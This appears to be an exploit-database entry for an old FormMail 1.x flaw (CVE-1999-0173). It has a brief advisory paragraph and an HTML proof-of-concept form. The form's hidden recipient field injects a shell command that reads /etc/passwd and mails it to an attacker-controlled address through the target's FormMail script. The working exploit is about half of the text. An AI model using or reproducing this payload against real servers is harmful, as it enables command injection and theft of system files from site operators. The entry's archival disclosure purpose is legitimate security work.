Matt Wright FormMail 1.x - Cross-Site Request Forgery

Author: anonymous
type: remote
platform: unix
port: 
date_added: 1997-01-01  
date_updated: 2012-08-13  
verified: 1  
codes: CVE-1999-0173;OSVDB-1684  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20486.html  
source: https://www.securityfocus.com/bid/2080/info

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.

A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability".

<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html>